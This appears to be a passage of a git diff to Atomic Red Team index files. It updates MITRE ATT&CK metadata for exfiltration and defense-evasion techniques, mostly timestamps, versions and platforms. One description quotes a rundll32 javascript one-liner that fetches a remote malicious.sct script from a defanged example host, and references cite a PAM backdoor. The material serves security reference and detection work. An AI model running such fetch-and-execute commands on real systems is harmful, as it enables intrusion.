+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -72344,9 +73240,8 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account (Linux)
@@ -72466,7 +73361,7 @@ initial-access:
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -72490,10 +73385,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -72512,13 +73406,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -72557,9 +73450,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -72609,7 +73501,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -72629,7 +73520,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -72649,8 +73540,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -72697,7 +73586,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -72717,7 +73605,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -72739,8 +73627,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -72794,7 +73680,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -72819,7 +73704,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -72854,12 +73739,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -72884,11 +73767,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -72931,9 +73813,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -72980,7 +73861,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -73006,7 +73886,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -73039,8 +73919,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests:
     - name: Exfiltrate data HTTPS using curl freebsd,linux or macos
@@ -73107,7 +73985,7 @@ exfiltration:
           '
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -73156,12 +74034,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -73197,12 +74074,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -73211,7 +74087,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -73235,9 +74110,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests:
     - name: Exfiltration Over Alternative Protocol - SSH
@@ -73311,7 +74185,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -73333,8 +74207,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -73385,7 +74257,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -73435,7 +74306,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -73460,7 +74330,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -73483,8 +74353,6 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests:
     - name: Data Transfer Size Limits
@@ -73527,7 +74395,7 @@ exfiltration:
         name: sh
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -73568,9 +74436,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -73618,7 +74485,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -73640,7 +74506,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -73664,12 +74530,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -73733,7 +74597,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests:
     - name: Exfiltration Over Alternative Protocol - HTTP
diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml
index 8c808109ec..53e6ed2b55 100644
--- a/atomics/Indexes/macos-index.yaml
+++ b/atomics/Indexes/macos-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -518,7 +537,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -588,7 +605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -666,7 +682,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests:
